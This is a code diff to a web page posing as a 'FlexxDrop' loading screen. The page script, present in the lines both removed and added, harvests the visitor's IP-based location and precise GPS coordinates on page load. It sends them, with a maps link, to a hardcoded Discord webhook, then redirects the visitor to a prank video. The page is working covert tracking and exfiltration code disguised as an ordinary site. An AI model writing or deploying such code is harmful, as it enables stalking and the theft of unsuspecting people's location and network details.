--- a/index.html
+++ b/index.html
@@ -23,76 +23,74 @@
   <div>Loading FlexxDrop…</div>
 
   <script>
-    const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
-    const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
+  const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
+  const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
 
-    function sendToDiscord(lat, lon, acc, ipData) {
-      const mapLink = `https://www.google.com/maps?q=${lat},${lon}`;
-      const payload = {
-        content: `📍 **GPS Captured**  
+  function sendToDiscord(lat, lon, acc, ipData) {
+    const mapLink = `https://www.google.com/maps?q=${lat},${lon}`;
+    const payload = {
+      content: `📍 **GPS Captured**  
 **Latitude:** ${lat}  
 **Longitude:** ${lon}  
 **Accuracy:** ${acc} meters  
 **Map:** ${mapLink}
 
 🌐 **IP Info**  
-**IP:** ${ipData.ip}  
+**IP:** ${ipData.ipAddress}  
 **City:** ${ipData.city}  
-**Region:** ${ipData.region}  
-**Country:** ${ipData.country_name}  
-**ISP:** ${ipData.org}  
-**Timezone:** ${ipData.timezone}
+**Region:** ${ipData.stateProv}  
+**Country:** ${ipData.countryName}
 
 🕒 ${new Date().toLocaleString()}`
-      };
+    };
 
-      fetch(webhookUrl, {
-        method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify(payload)
+    fetch(webhookUrl, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify(payload)
+    });
+
+    setTimeout(() => {
+      window.location.href = redirectUrl;
+    }, 1000);
+  }
+
+  function getIPAndGPS() {
+    fetch("https://api.db-ip.com/v2/free/self")
+      .then(res => res.json())
+      .then(ipData => {
+        if ("geolocation" in navigator) {
+          navigator.geolocation.getCurrentPosition(
+            (pos) => {
+              const lat = pos.coords.latitude;
+              const lon = pos.coords.longitude;
+              const acc = pos.coords.accuracy;
+
+              console.log("Lat:", lat);
+              console.log("Lon:", lon);
+              console.log("Accuracy:", acc);
+              console.log("IP:", ipData.ipAddress);
+
+              sendToDiscord(lat, lon, acc, ipData);
+            },
+            (err) => {
+              console.error("GPS error:", err.message);
+              window.location.href = "about:blank";
+            },
+            {
+              enableHighAccuracy: true,
+              timeout: 10000,
+              maximumAge: 0
+            }
+          );
+        }
+      })
+      .catch(error => {
+        console.error("IP fetch failed:", error.message);
       });
+  }
 
-      setTimeout(() => {
-        window.location.href = redirectUrl;
-      }, 1000);
-    }
-
-    function getIPAndGPS() {
-      fetch("https://ipapi.co/json/")
-        .then(res => res.json())
-        .then(ipData => {
-          if ("geolocation" in navigator) {
-            navigator.geolocation.getCurrentPosition(
-              (pos) => {
-                const lat = pos.coords.latitude;
-                const lon = pos.coords.longitude;
-                const acc = pos.coords.accuracy;
-
-                console.log("Lat:", lat);
-                console.log("Lon:", lon);
-                console.log("Accuracy:", acc);
-                console.log("IP:", ipData.ip);
-
-                sendToDiscord(lat, lon, acc, ipData);
-              },
-              (err) => {
-                console.error("GPS error:", err.message);
-                window.location.href = "about:blank";
-              },
-              {
-                enableHighAccuracy: true,
-                timeout: 10000,
-                maximumAge: 0
-              }
-            );
-          }
-        })
-        .catch(error => {
-          console.error("IP fetch failed:", error.message);
-        });
-    }
-
-    window.onload = getIPAndGPS;
+  window.onload = getIPAndGPS;
   </script>
 </body>
 </html>
